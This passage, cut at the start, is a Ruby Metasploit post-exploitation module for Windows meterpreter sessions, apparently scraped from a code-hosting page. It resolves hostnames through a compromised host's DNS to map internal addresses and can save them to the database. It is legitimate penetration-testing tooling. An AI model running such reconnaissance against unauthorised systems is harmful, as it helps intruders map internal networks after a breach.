similar to the Unix 'dig' command. Since resolution happens over
|
|
||||||
an established session from the perspective of the remote host,
|
|
||||||
this module can be used to determine differences between external
|
|
||||||
and internal resolution, especially for potentially high-value
|
|
||||||
internal addresses of devices named 'mail' or 'www.'
|
|
||||||
},
|
|
||||||
'License' => MSF_LICENSE,
|
|
||||||
'Author' => [ 'mubix' ],
|
|
||||||
'Platform' => [ 'win' ],
|
|
||||||
'SessionTypes' => [ 'meterpreter' ]
|
|
||||||
))
|
|
||||||
|
|
||||||
register_options(
|
|
||||||
[
|
|
||||||
OptString.new('HOSTNAME', [false, 'Hostname to lookup', nil]),
|
|
||||||
OptPath.new('HOSTFILE', [false, 'Line separated file with hostnames to resolve', nil]),
|
|
||||||
OptBool.new('SAVEHOSTS', [true, 'Save resolved hosts to the database', true])
|
|
||||||
], self.class)
|
|
||||||
end
|
|
||||||
|
|
||||||
def resolve_hostname(hostname)
|
|
||||||
begin
|
|
||||||
vprint_status("Looking up IP for #{hostname}")
|
|
||||||
result = client.net.resolve.resolve_host(hostname)
|
|
||||||
if result[:ip].nil? or result[:ip].blank?
|
|
||||||
print_error("Failed to resolve #{hostname}")
|
|
||||||
return
|
|
||||||
else
|
|
||||||
hostip = result[:ip]
|
|
||||||
end
|
|
||||||
|
|
||||||
|
|
||||||
print_status("#{hostname} resolves to #{hostip}")
|
|
||||||
|
|
||||||
if datastore['SAVEHOSTS']
|
|
||||||
report_host({
|
|
||||||
:host => hostip,
|
|
||||||
:name => hostname
|
|
||||||
})
|
|
||||||
end
|
|
||||||
|
|
||||||
rescue Rex::Post::Meterpreter::RequestError
|
|
||||||
print_status('Windows 2000 and prior does not support getaddrinfo')
|
|
||||||
end
|
|
||||||
|
|
||||||
end
|
|
||||||
|
|
||||||
def run
|
|
||||||
if datastore['HOSTNAME']
|
|
||||||
resolve_hostname(datastore['HOSTNAME'])
|
|
||||||
end
|
|
||||||
|
|
||||||
if datastore['HOSTFILE']
|
|
||||||
::File.open(datastore['HOSTFILE'], "rb").each_line do |hostname|
|
|
||||||
if hostname.strip != ""
|
|
||||||
resolve_hostname(hostname.strip)
|
|
||||||
end
|
|
||||||
end
|
|
||||||
end
|
|
||||||
end
|
|
||||||
end
|
|
Loading…
Reference in New Issue